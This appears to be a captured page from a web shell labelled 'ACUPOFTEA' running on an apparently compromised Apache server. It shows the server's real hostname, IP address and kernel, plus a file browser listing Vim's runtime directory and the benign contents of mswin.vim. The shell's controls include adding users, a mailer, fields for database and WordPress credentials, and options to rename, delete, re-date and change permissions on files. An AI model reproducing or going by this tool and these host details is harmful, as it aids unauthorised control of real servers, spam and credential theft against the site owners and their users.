System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
vim
/
vim80
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
mswin.vim
" Set options and add mapping such that Vim behaves a lot like MS-Windows " " Maintainer: Bram Moolenaar <Bram@vim.org> " Last change: 2017 Oct 28 " bail out if this isn't wanted (mrsvim.vim uses this). if exists("g:skip_loading_mswin") && g:skip_loading_mswin finish endif " set the 'cpoptions' to its Vim default if 1 " only do this when compiled with expression evaluation let s:save_cpo = &cpoptions endif set cpo&vim " set 'selection', 'selectmode', 'mousemodel' and 'keymodel' for MS-Windows behave mswin " backspace and cursor keys wrap to previous/next line set backspace=indent,eol,start whichwrap+=<,>,[,] " backspace in Visual mode deletes selection vnoremap <BS> d if has("clipboard") " CTRL-X and SHIFT-Del are Cut vnoremap <C-X> "+x vnoremap <S-Del> "+x " CTRL-C and CTRL-Insert are Copy vnoremap <C-C> "+y vnoremap <C-Insert> "+y " CTRL-V and SHIFT-Insert are Paste map <C-V> "+gP map <S-Insert> "+gP cmap <C-V> <C-R>+ cmap <S-Insert> <C-R>+ endif " Pasting blockwise and linewise selections is not possible in Insert and " Visual mode without the +virtualedit feature. They are pasted as if they " were characterwise instead. " Uses the paste.vim autoload script. " Use CTRL-G u to have CTRL-Z only undo the paste. if 1 exe 'inoremap <script> <C-V> <C-G>u' . paste#paste_cmd['i'] exe 'vnoremap <script> <C-V> ' . paste#paste_cmd['v'] endif imap <S-Insert> <C-V> vmap <S-Insert> <C-V> " Use CTRL-Q to do what CTRL-V used to do noremap <C-Q> <C-V> " Use CTRL-S for saving, also in Insert mode noremap <C-S> :update<CR> vnoremap <C-S> <C-C>:update<CR> inoremap <C-S> <C-O>:update<CR> " For CTRL-V to work autoselect must be off. " On Unix we have two selections, autoselect can be used. if !has("unix") set guioptions-=a endif " CTRL-Z is Undo; not in cmdline though noremap <C-Z> u inoremap <C-Z> <C-O>u " CTRL-Y is Redo (although not repeat); not in cmdline though noremap <C-Y> <C-R> inoremap <C-Y> <C-O><C-R> " Alt-Space is System menu if has("gui") noremap <M-Space> :simalt ~<CR> inoremap <M-Space> <C-O>:simalt ~<CR> cnoremap <M-Space> <C-C>:simalt ~<CR> endif " CTRL-A is Select all noremap <C-A> gggH<C-O>G inoremap <C-A> <C-O>gg<C-O>gH<C-O>G cnoremap <C-A> <C-C>gggH<C-O>G onoremap <C-A> <C-C>gggH<C-O>G snoremap <C-A> <C-C>gggH<C-O>G xnoremap <C-A> <C-C>ggVG " CTRL-Tab is Next window noremap <C-Tab> <C-W>w inoremap <C-Tab> <C-O><C-W>w cnoremap <C-Tab> <C-C><C-W>w onoremap <C-Tab> <C-C><C-W>w " CTRL-F4 is Close window noremap <C-F4> <C-W>c inoremap <C-F4> <C-O><C-W>c cnoremap <C-F4> <C-C><C-W>c onoremap <C-F4> <C-C><C-W>c if has("gui") " CTRL-F is the search dialog noremap <expr> <C-F> has("gui_running") ? ":promptfind\<CR>" : "/" inoremap <expr> <C-F> has("gui_running") ? "\<C-\>\<C-O>:promptfind\<CR>" : "\<C-\>\<C-O>/" cnoremap <expr> <C-F> has("gui_running") ? "\<C-\>\<C-C>:promptfind\<CR>" : "\<C-\>\<C-O>/" " CTRL-H is the replace dialog, " but in console, it might be backspace, so don't map it there nnoremap <expr> <C-H> has("gui_running") ? ":promptrepl\<CR>" : "\<C-H>" inoremap <expr> <C-H> has("gui_running") ? "\<C-\>\<C-O>:promptrepl\<CR>" : "\<C-H>" cnoremap <expr> <C-H> has("gui_running") ? "\<C-\>\<C-C>:promptrepl\<CR>" : "\<C-H>" endif " restore 'cpoptions' set cpo& if 1 let &cpoptions = s:save_cpo unlet s:save_cpo endif
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
..
DIR
-
drwxr-xr-x
2025-10-12 12:23:12
autoload
DIR
-
drwxr-xr-x
2025-10-13 10:57:16
colors
DIR
-
drwxr-xr-x
2025-10-13 10:57:16
compiler
DIR
-
drwxr-xr-x
2025-10-13 10:57:16
doc
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
ftplugin
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
indent
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
keymap
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
lang
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
macros
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
pack
DIR
-
drwxr-xr-x
2025-10-12 12:23:12
plugin
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
print
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
spell
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
syntax
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
tutor
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
bugreport.vim
text/plain
1.91 KB
-rw-r--r--
2025-10-12 12:23:12
defaults.vim
text/plain
4.02 KB
-rw-r--r--
2025-10-12 12:23:12
delmenu.vim
text/plain
645 B
-rw-r--r--
2025-10-12 12:23:12
evim.vim
text/plain
2.2 KB
-rw-r--r--
2025-10-12 12:23:12
filetype.vim
text/plain
54.83 KB
-rw-r--r--
2025-10-12 12:23:12
ftoff.vim
text/plain
280 B
-rw-r--r--
2025-10-12 12:23:12
ftplugin.vim
text/plain
971 B
-rw-r--r--
2025-10-12 12:23:12
ftplugof.vim
text/plain
337 B
-rw-r--r--
2025-10-12 12:23:12
gvimrc_example.vim
text/plain
1.56 KB
-rw-r--r--
2025-10-12 12:23:12
indent.vim
text/plain
767 B
-rw-r--r--
2025-10-12 12:23:12
indoff.vim
text/plain
282 B
-rw-r--r--
2025-10-12 12:23:12
menu.vim
text/plain
38.54 KB
-rw-r--r--
2025-10-12 12:23:12
mswin.vim
text/html
3.32 KB
-rw-r--r--
2025-10-12 12:23:12
optwin.vim
text/plain
58.32 KB
-rw-r--r--
2025-10-12 12:23:12
rgb.txt
text/plain
17.36 KB
-rw-r--r--
2025-10-12 12:23:12
scripts.vim
text/plain
10.91 KB
-rw-r--r--
2025-10-12 12:23:12
synmenu.vim
text/plain
36.11 KB
-rw-r--r--
2025-10-12 12:23:12
vimrc_example.vim
text/plain
1.46 KB
-rw-r--r--
2025-10-12 12:23:12
~ ACUPOFTEA - mail.ontime-ae.com